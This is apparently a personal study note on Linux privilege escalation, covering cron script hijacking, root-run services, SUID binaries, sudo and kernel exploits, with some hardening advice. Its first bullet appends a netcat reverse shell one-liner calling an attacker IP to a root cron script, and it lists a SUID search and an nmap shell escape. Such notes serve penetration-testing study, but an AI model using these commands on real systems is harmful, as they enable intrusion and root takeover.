Anonymvs17/hacking/notes/priviledgeEscalation.md

 * Since an unprivileged user can modify the contents of the backup script, we can edit it and add a reverse shell one-liner ``echo >> user_backup.sh`` && ``echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f" >> user_backups.sh``
 * Open nc reverese shell in kali => and once this CJ runs we should have root acccess shell

+## Exploiting services which are running as root
+*Exploiting any service which is running as root will give you Root!* Example MySQL

+* ``netstat -antup`` – It shows you all the ports which are open and are listening.
+We can check for services which are running locally if they could be exploited or not.
+* `ps -aux | grep root` – It shows us the services which are running as root.
+* One of the biggest mistake web admins do, is to run a webserver with root privilege.
+A command injection vulnerability on the web application can lead an attacker to root shell.
+This is a classic example of why you should never run any service as root unless really required.
+*Never run any service as root unless really required, especially web, database and file servers.*

+## Exploiting SUID Executables
+SUID which stands for set user ID, is a Linux feature that allows users to execute a file with the permissions of a specified user.
+For example, the Linux ping command typically requires root permissions in order to open raw network sockets.
+By marking the ping program as SUID with the owner as root, ping executes with root privileges anytime a low privilege user executes the program.

+* when `ls -la` a file you might see `rwsr-xr-x–` The *‘s’* character instead of ‘x’ indicates that the SUID bit is set
+* `find / -perm -u=s -type f 2>/dev/null`- It prints the executables which have SUID bit set
+* For example if nmap or python is enabled we might get root `nmap –interactive` – runs nmap interactive mode

+    SUID bit should not be set to any program which lets you escape to the shell.
+    You should never set SUID bit on any file editor/compiler/interpreter as an attacker can easily read/overwrite any files present on the system.

+## Exploiting SUDO rights/user
+If the attacker can’t directly get root access via any other techniques he might try to compromise any of the users who have SUDO access

+## Kernel exploits
+use this if other things not possible